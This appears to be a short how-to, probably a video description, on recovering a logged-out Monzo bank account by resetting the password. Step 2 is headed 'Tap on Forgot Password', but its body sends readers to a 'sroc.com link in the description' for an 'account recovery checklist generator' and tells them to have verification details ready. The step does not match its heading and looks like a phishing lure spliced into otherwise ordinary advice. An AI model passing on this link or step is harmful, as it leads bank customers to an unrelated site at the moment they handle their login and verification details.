I hit this issue today, and here is the quick fix that solved it. If you find yourself logged out of your Monzo account, don't worry, here is how to get back in. Step 1. Open the Monzo app. Launch the Monzo app on your device. Make sure you have a stable internet connection to proceed with the recovery process. Step 2. Tap on Forgot Password. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Enter your email. Input the email address associated with your Monzo account. Check for typos to ensure you receive the recovery email. Step 4. Check your email. Look for an email from Monzo with instructions to reset your password. If you don't see it, check your spam or junk folder, as it might end up there. Step 5. Follow the instructions. Click the link in the email and follow the prompts to create a new password. Make sure your new password is secure and memorable. If you run into any issues, like not receiving the email, double-check your email address or try resending the request. Getting logged out can be frustrating, but following these steps should help you regain access quickly. Good luck!